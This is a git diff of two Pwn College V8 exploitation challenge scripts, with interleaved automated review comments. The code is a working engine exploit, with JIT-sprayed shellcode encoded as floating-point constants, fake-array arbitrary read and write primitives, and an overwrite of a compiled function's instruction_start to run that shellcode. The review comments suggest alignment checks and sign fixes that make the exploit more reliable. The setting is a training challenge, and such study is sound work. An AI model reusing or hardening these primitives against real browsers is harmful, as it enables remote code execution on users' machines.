diff --git a/JavaScript/PwnCollegeV8Exploitation/Level3/Exploit.js b/JavaScript/PwnCollegeV8Exploitation/Level3/Exploit.js index f9c9337..37340b7 100644 --- a/JavaScript/PwnCollegeV8Exploitation/Level3/Exploit.js +++ b/JavaScript/PwnCollegeV8Exploitation/Level3/Exploit.js @@ -36,7 +36,7 @@ function shellcode() { // Promote to ensure not GC during training // JIT spray machine code form of `execve("catflag", NULL, NULL)` return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61]; } -for (let i = 0; i < 100000; i++) shellcode(); // Trigger MAGLEV compilation +for (let i = 0; i < 10000; i++) shellcode(); // Trigger MAGLEV compilation // Create a PACKED_DOUBLE_ELEMENTS array contains faked PACKED_DOUBLE_ELEMENTS array // map, properties, elements, length --- first three field are static roots @@ -64,7 +64,7 @@ function ArbWrite64(cage_addr, value) { // int32, bigint arr[1] = c2f(ptr(cage_addr - 0x8), 0x00008000); let written = b2f(value); fakearr[0] = written; - console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${written.toString(16)}`); + console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${value.toString(16)}`); } // ArbRead64(0xfffffff0); 
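Review bot: The new iteration count `10000` is a bare magic number whose only justification is the trailing comment `// Trigger MAGLEV compilation`, and nothing in the visible hunks checks that the tier-up actually happened before `instruction_start` is patched and `shellcode()` is called at the end of the file. If the tiering thresholds or flags of the target d8 build differ, the sprayed doubles may never be emitted into a Maglev code object and the final call jumps into whatever is there instead. I would name the constant and record the assumption, e.g. `const TIERUP_ITERATIONS = 10000; // enough calls to reach Maglev on the d8 build this was tuned against — re-verify on other versions`, and use it in the loop. The `shellcode` function definition starts before this hunk.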
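Review bot: ArbWrite64 has no alignment guard, unlike ArbRead32/ArbWrite32 further down which reject unaligned addresses with `Must DWORD Aligned`, so a caller passing a `cage_addr` that is not 8-byte aligned points the fake elements at a misaligned slot and silently clobbers neighbouring bytes. The log on the changed line is also only emitted after `fakearr[0] = written;`, so if that write takes the process down there is no record of which address was hit. I would add `if (cage_addr & 0x7) throw new Error("Must QWORD Aligned");` at the top of the function and move the `console.log` before the write. The function's signature is outside this hunk; only its trailer is visible in the `@@` line.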
@@ -74,16 +74,17 @@ function ArbWrite64(cage_addr, value) { // int32, bigint function ArbRead32(cage_addr) { // int32 -> int32 if (cage_addr & 0x3) throw new Error("Must DWORD Aligned"); bi64a[0] = ArbRead64(cage_addr & 0xfffffff8); - let result = si32a[(cage_addr & 0x4) >> 2]; + let result = i32a[(cage_addr & 0x4) >> 2]; console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`); return result; } +// DWORD Aligned function ArbWrite32(cage_addr, value) { // int32, int32 -> void if (cage_addr & 0x3) throw new Error("Must DWORD Aligned"); let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8; bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr); - si32a[(cage_addr & 0x4) >> 2] = value; + i32a[(cage_addr & 0x4) >> 2] = value; ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]); console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`); } @@ -101,5 +102,3 @@ let instruction_start = ArbRead32(instruction_start_addr); console.log("instruction_start: " + instruction_start.toString(16)); ArbWrite32(instruction_start_addr, instruction_start + 0x6B); shellcode(); - -// Due to heap fengshui, the possibility of getting flag by running exploit once is 1/10 \ No newline at end of file diff --git a/JavaScript/PwnCollegeV8Exploitation/Level4/Exploit.js b/JavaScript/PwnCollegeV8Exploitation/Level4/Exploit.js index a10f78c..bc26401 100644 --- a/JavaScript/PwnCollegeV8Exploitation/Level4/Exploit.js +++ b/JavaScript/PwnCollegeV8Exploitation/Level4/Exploit.js 
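Review bot: ArbRead32 hands `i32a[(cage_addr & 0x4) >> 2]` straight back to the caller, and if `i32a` is an Int32Array (its declaration is not in this hunk) any word with the top bit set comes back negative, so the log prints something like `-a` instead of `fffffff6` and `instruction_start + 0x6B` at the end of the file is computed on a negative value; that store still lands correctly only because the typed-array assignment truncates to 32 bits. Returning and logging `i32a[(cage_addr & 0x4) >> 2] >>> 0` gives a consistent unsigned view; note that `cage_addr & 0xfffffff8` has the same int32 sign issue for cage addresses at or above 0x80000000, which `ArbRead64` then has to cope with. The added `// DWORD Aligned` comment above ArbWrite32 has no counterpart above ArbRead32 in this file, whereas Level4 carries it on both; either add it here too or drop it, since the `throw` already states the requirement.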
@@ -35,7 +35,7 @@ function shellcode() { // Promote to ensure not GC during training // JIT spray machine code form of `execve("catflag", NULL, NULL)` return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61]; } -for (let i = 0; i < 100000; i++) shellcode(); // Trigger MAGLEV compilation +for (let i = 0; i < 10000; i++) shellcode(); // Trigger MAGLEV compilation let placeholder = {}; let corrupt_arr = [2.30234590962020889586281057477E-320]; @@ -85,23 +85,24 @@ function ArbWrite64(cage_addr, value) { // int32, bigint corrupt_arr[corrupt_arr_0_to_double_arr_element_offset] = c2f(ptr(cage_addr - 0x8), 0x00000002); let written = b2f(value); double_arr[0] = written; - console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${written.toString(16)}`); + console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${value.toString(16)}`); } // DWORD Aligned function ArbRead32(cage_addr) { // int32 -> int32 if (cage_addr & 0x3) throw new Error("Must DWORD Aligned"); bi64a[0] = ArbRead64(cage_addr & 0xfffffff8); - let result = si32a[(cage_addr & 0x4) >> 2]; + let result = i32a[(cage_addr & 0x4) >> 2]; console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`); return result; } +// DWORD Aligned function ArbWrite32(cage_addr, value) { // int32, int32 -> void if (cage_addr & 0x3) throw new Error("Must DWORD Aligned"); let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8; bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr); - si32a[(cage_addr & 0x4) >> 2] = value; + i32a[(cage_addr & 0x4) >> 2] = value; ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]); console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`); } 
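Review bot: The `100000` → `10000` change is made here and in Level3/Exploit.js as two separate magic numbers with no shared definition and no note on why the smaller count is sufficient, so the next tiering-threshold change has to be found and fixed twice. A short comment recording the assumption would prevent that, e.g. `// 10000 calls tiered shellcode() up to Maglev on the d8 build this was tested against; if the sprayed doubles stop showing up in the code object, raise this first`. The `shellcode` function definition starts before this hunk.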
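Review bot: ArbWrite32 only works because `bi64a` and `i32a` alias the same 8-byte buffer — it loads the QWORD through `bi64a[0]`, patches one half through `i32a[...]`, and writes the whole QWORD back from `bi64a[0]` — but that invariant is stated nowhere, and the rename from `si32a` makes it easier to miss. I would put a comment above ArbRead32 such as `// bi64a and i32a must view the same ArrayBuffer: the 32-bit half is read/patched via i32a and the full QWORD is transferred via bi64a`. ArbWrite64 also lacks the alignment check its 32-bit wrappers have, so a direct caller with a non-8-byte-aligned `cage_addr` silently corrupts adjacent bytes; `if (cage_addr & 0x7) throw new Error("Must QWORD Aligned");` at the top of that function, which starts before this hunk, would match the existing `Must DWORD Aligned` guards.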
@@ -115,5 +116,3 @@ let instruction_start = ArbRead32(instruction_start_addr);
 console.log("instruction_start: " + instruction_start.toString(16));
 ArbWrite32(instruction_start_addr, instruction_start + 0x6B);
 shellcode();
-
-// the possibility of getting flag by running exploit once is 1/10
\ No newline at end of file